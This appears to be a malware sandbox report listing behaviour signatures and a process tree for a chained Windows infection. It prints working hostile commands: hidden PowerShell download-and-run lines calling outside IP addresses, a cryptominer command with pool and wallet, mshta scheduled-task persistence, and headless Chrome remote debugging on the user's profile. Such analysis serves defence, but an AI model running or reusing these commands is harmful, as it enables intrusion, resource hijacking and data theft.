Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\nxpsp\mcsq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A (5 invocations)

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe
PID 1660 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2668 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1620 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 5036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5036 wrote to memory of 116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 116 wrote to memory of 972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 972 wrote to memory of 5108 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 116 wrote to memory of 3432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2668 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
PID 2036 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe C:\Users\Admin\AppData\Local\Temp\dll32.exe
PID 2668 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 5036 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 4924 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 2668 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe
PID 3432 wrote to memory of 1940 N/A C:\Windows\Explorer.EXE C:\Windows\System32\notepad.exe
PID 2668 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
PID 3432 wrote to memory of 1972 N/A C:\Windows\Explorer.EXE C:\Windows\system32\tasklist.exe
PID 2668 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe
PID 2972 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe C:\Windows\SysWOW64\mshta.exe
PID 4228 wrote to memory of 4640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe

"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"

C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe

"C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB10.tmp" "c:\Users\Admin\AppData\Local\Temp\5muhcagw\CSCE2143F3F87124EFFBE7090E7EC1FD14.TMP"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"

C:\Users\Admin\AppData\Local\Temp\dll32.exe

"C:\Users\Admin\AppData\Local\Temp\dll32.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe

"C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE

"C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 4264"

C:\Windows\system32\find.exe

find ":"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe

"C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "R0yhcmahnHj" /tr "mshta \"C:\Temp\WK6TyvNYU.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\WK6TyvNYU.hta"

C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe

"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe

"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"

C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe

"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1584 -ip 1584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 812

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe

"C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe

"C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\nxpsp\mcsq.exe

C:\ProgramData\nxpsp\mcsq.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe

"C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1940"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffa2898cc40,0x7ffa2898cc4c,0x7ffa2898cc58

C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe

"C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1408,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1400 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1372,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1644 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe

"C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe"

